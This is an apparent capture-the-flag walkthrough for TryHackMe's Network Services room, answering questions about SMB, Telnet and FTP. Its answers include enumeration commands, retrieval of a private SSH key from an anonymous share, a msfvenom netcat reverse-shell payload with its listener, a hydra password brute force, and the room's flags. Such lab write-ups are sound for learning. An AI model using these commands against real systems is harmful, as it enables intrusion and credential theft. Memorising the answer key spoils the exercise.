Network Services
# Task 2 Understanding SMB
- What does SMB stand for?
Server Message Block
- What type of protocol is SMB?
response-request
- What do clients connect to servers using?
TCP/IP
- What systems does Samba run on?
Unix
# Task 3 Enumerating SMB
- Conduct an nmap scan of your choosing. How many ports are open?
hint: nmap -A -p- $IP
3
- What ports is SMB running on?
139/445
- Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
WORKGROUP
- What comes up as the name of the machine?
POLOSMB
- What operating system version is running?
6.1
- What share sticks out as something we might want to investigate?
profiles
# Task 4 Exploiting SMB
- What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 445
- Does the share allow anonymous access? Y/N?
Y
- Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
John Cactus
- What service has been configured to allow him to work from home?
ssh
- Okay! Now we know this, what directory on the share should we look in?
.ssh
- This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
id_rsa
- What is the smb.txt flag?
THM{smb_is_fun_eh?}
# Task 5 Understanding Telnet
- What is Telnet?
application protocol
- What has slowly replaced Telnet?
ssh
- How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
telnet 10.10.10.3 23
- The lack of what, means that all Telnet communication is in plaintext?
encryption
# Task 6 Enumerating Telnet
- How many ports are open on the target machine?
hint: nmap -A -p- $IP
1
- What port is this?
8012
- This port is unassigned, but still lists the protocol it's using, what protocol is this?
TCP
- Now re-run the nmap scan, without the -p- tag, how many ports show up as open?
0
- Based on the title returned to us, what do we think this port could be used for?
a backdoor
- Who could it belong to? Gathering possible usernames is an important step in enumeration.
Skidy
# Task 7 Exploiting Telnet
- Great! It's an open telnet connection! What welcome message do we receive?
hint: telnet $IP 8012
SKIDY'S BACKDOOR.
- Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
N
- Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
hint: tcpdump ip proto \\icmp -i tun0
(tun0 is the OpenVPN network interface; use whichever interface carries your VPN connection)
Y
We're going to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for us. Here's our syntax:
"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"
-p = payload
lhost = our local host IP address (this is your machine's IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format
- What word does the generated payload start with?
mkfifo
Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:
"nc -lvp [listening port]"
- What would the command look like for the listening port we selected in our payload?
nc -lvp 4444
- Success! What are the contents of flag.txt?
THM{y0u_g0t_th3_t3ln3t_fl4g}
# Task 8 Understanding FTP
- What communications model does FTP use?
client-server
- What's the standard FTP port?
21
- How many modes of FTP connection are there?
2
# Task 9 Enumerating FTP
- Run an nmap scan of your choice. How many ports are open on the target machine?
hint: nmap -sVSC -Pn -vv $IP
(the scan shows only port 21 as open, but the accepted answer is 2)
2
- What port is ftp running on?
21
- What variant of FTP is running on it?
vsftpd
Great, now that we know what type of FTP server we're dealing with, we can check whether we are able to log in anonymously to the FTP server. We can do this by typing "ftp [IP]" into the console, entering "anonymous" as the username, and giving no password when prompted.
- What is the name of the file in the anonymous FTP directory?
hint: ftp $IP
anonymous
ls
get PUBLIC_NOTICE.txt
PUBLIC_NOTICE.txt
- What do we think a possible username could be?
hint: cat PUBLIC_NOTICE.txt
mike
# Task 10 Exploiting FTP
- What is the password for the user "mike"?
hint: hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV $IP ftp
password
- What is ftp.txt?
hint: ftp $IP
mike
ls
get ftp.txt
THM{y0u_g0t_th3_ftp_fl4g}
https://tryhackme.com/room/networkservices
https://juliette1012.github.io/posts/THM-Network-Services/
https://fthcyber.com/2020/09/30/network-services-writeup-tryhackme/
https://wuvel.net/network-services/